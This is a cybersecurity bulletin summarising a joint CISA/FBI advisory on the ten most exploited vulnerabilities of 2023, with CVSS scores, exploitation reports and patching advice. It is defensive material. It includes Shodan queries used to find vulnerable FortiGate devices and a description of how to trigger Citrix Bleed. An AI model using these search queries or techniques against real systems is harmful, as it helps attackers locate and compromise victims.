In November 2024, a Joint Cybersecurity Advisory published by CISA, the FBI, and other partners detailed the most exploited vulnerabilities of 2023. These vulnerabilities garner urgency for remediation as these vulnerable systems are actively targeted. While most of the vulnerabilities detailed were publicized in 2023, some flaws are from 2021 and 2022, highlighting the need for more timely patching of critical vulnerabilities. The NJCCIC describes each vulnerability, CVSS score, and exploitation:

1. CVE-2023-3519

• Product(s): Citrix NetScaler ADC
• CVSS Score: 9.8 (Critical)
• Description: Allows an attacker to execute code remotely without authentication on Citrix NetScaler by crafting code in a way to alter the intended control flow.
  • Exploitation:
    • In mid-2023, CISA observed threat actors utilizing CVE-2023-3519 to implant webshells on target victim environments. The implanted webshell would allow for root level access and perform discovery against the networks Active Directory (AD).

2. CVE-2023-4966 – Citrix Bleed

• Product(s): Citrix NetScaler ADC
• CVSS Score: 9.4 (Critical)
• Description: An attack performing certain operations can overflow the memory buffer on Citrix’s NetScaler ADC and NetScaler Gateway.  This is done by either reading or writing outside the memory buffer’s intended boundary.
• Exploitation:
  • Multiple incidents involving the Citrix Bleed vulnerability have been observed in the wild beginning in late August 2023 by Mandiant. This exploitation involved threat actors successfully taking over legitimate user sessions, bypassing password and multi-factor-authentication (MFA). Mandiant researchers found that crafting an HTTP GET request with an HTTP host header greater than a certain length would have the vulnerable NetScaler return system memory contents such as session cookies which include authentication checks.

3. CVE-2023-20198

• Product(s): Cisco IOS XE Software
• CVSS Score: 10.0 (Critical)
• Description: Utilizing an alternate channel, an attacker can elevate privileges on the Web UI of Cisco’s IOS XE – an internetworked operating system built from Linux that primarily resides on Cisco routers and switches.
• Exploitation:
  • In October 2024, Cisco Talos Incident Response observed CVE-2023-20198 being exploited through the creation of a malicious implant that became active once the web server it was delivered to was restarted. The restart would remove the implant but the user account with administrator privileges created from it would remain on the system. Cisco Talos tracks the implant as “Bad Candy” and was saved under the file path /usr/binos/conf/nginx-conf/cisco_service.conf.

4. CVE-2023-20273

• Product(s): Cisco IOS XE Software
• CVSS Score: 7.2 (High)
• Description: A vulnerability within the web UI feature of Cisco’s IOS XE software that could allow for an unauthenticated attacker to remotely inject commands with root privileges due to a lack of comprehensive validation.
• Exploitation:
  • Cisco Talos Incident Response noted the use of CVE-2023-20273 in succession of CVE-2023-20198 to utilize the newly established account for command injection with root privileges for remote code execution on the target device.

5. CVE-2023-27997

• Product(s): Fortinet FortiOS-6K7K
• CVSS Score: 9.2 (Critical)
• Description: A heap-based buffer overflow on FortiOS and FortiProxy SSL-VPN which allows for an attacker to remotely execute arbitrary commands or code.
• Exploitation:
  • The vulnerability may have been exploited by threat actors in attacks against government, manufacturing, and critical infrastructure organizations. While China-based threat actor Volt Typhoon has not been confirmed to utilize the vulnerability, Fortinet has mentioned the group could likely exploit the vulnerability. The following Shodan searches have been used by threat actors to search for vulnerable devices:
    • ssl.cert.subject.cn:FortiGate
    • http.html_hash:-1454941180

6. CVE-2023-34362

• Product(s): Progress MOVEit
• CVSS Score: 9.8 (Critical)
• Description: A SQL injection found in the MOVEit Transfer web application can allow unauthenticated access to the associated database.  This has been observed as being susceptible due to improper neutralization of special characters by the software.
• Exploitation:
  • According to reporting from CISA, the MOVEit vulnerability has been exploited by the CL0P ransomware gang. CL0P utilized the LEMURLOOT webshell to steal data from MOVEit Trasnfer databases. An estimated total of organizations exploited by CL0P using the MOVEit vulnerability is thought to be at least 121, affecting 15 million individuals.

7. CVE-2023-22515

• Product(s): Atlassian Confluence Data Center, Confluence Server
• CVSS Score: 10.0 (Critical)
• Description: Improper input validation allows for broken access control. This can lead to the creation of unauthorized Confluence administrator accounts and access to specific Confluence instances.
• Exploitation:
  • The FBI has observed multiple IP addresses performing data exfiltration from organizations exposed by the vulnerability. Additionally, the following User-Agent strings were present in request headers used by multiple threat actors:
    • Python-requests/2.27.1 
    • curl/7.88.1

8. CVE-2021- 44228 – Log4j

• Product(s): Apache Log4j2
• CVSS Score: 10.0 (Critical)
• Description: Certain versions of Apache Log4j have features that do not protect against an attacker-controlled LDAP, which allows an attacker with control of log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. This is also combined with uncontrolled resource consumption and improper input validation.
• Exploitation:
  • Threat actors have been routinely exploited Log4j in the wild since its initial discovery in 2021. Threat actors can format an LDAP request to trigger the vulnerability. In many cases of successful exploitation, the victims would be infected by a variety of payloads including cryptocurrency mining malware and botnets.

9. CVE-2023-2868

• Product(s): Barracuda Email Security Gateway
• CVSS Score: 9.4 (Critical)
• Description: A remote code injection vulnerability exists due to failure to fully sanitize .tar files. This occurs from incomplete input validation from the .tar files supplied by the end user. An attacker could format these file names in a way which allows remote execution of system commands.
• Exploitation:
  • Mandiant has observed China-based threat actors utilizing the vulnerability across a variety of sectors in espionage campaigns supporting the interests of the People’s Republic of China. The threat actor would send phishing emails to target organizations containing malicious file attachments that would exploit the vulnerability for initial access.

10. CVE-2022-47966

• Product(s):  ServiceDesk Plus,  Access Manager Plus,  Active Directory 360, ADAudit Plus,  ADManager Plus, ADSelfService Plus,  Analytics Plus,  Application Control Plus, Asset Explorer,  Browser Security Plus,  Device Control Plus, Endpoint Central, Endpoint Central MSP, Endpoint DLP,  Key Manager Plus, OS Deployer, PAM 360, Password Manager Pro, Patch Manager Plus, Remote Access Plus, Remote Monitoring and Management (RMM), ServiceDesk Plus MSP, SupportCenter Plus, Vulnerability Manager Plus
• CVSS Score: 9.8 (Critical)
  Description: Multiple Zoho ManageEngine on-premise products allow an attacker to perform remote code execution due to specific versions of Apache Santuario xmlsec (XML Security for Java).  Exploitation is only possible with SAML SSO configuration on the products. This is due to improper input validation.
• Exploitation:
  • CISA has observed nation state actors utilizing the vulnerability to gain unauthorized access to organizations in the aerospace sector, likely for espionage purposes. The vulnerability was often also exploited by nation state threat actors in tandem with CVE-2022-42475.

Recommendations:

• Organizations utilizing the affected products should incorporate quick patch management practices and update the affected products to their most recent stable releases.
• If affected versions of the products were in use by the organization logs should be evaluated for possible exploitation, past and present.
• Security awareness training should incorporate awareness of threat actors targeting specific products that may be part of an organization’s attack surface.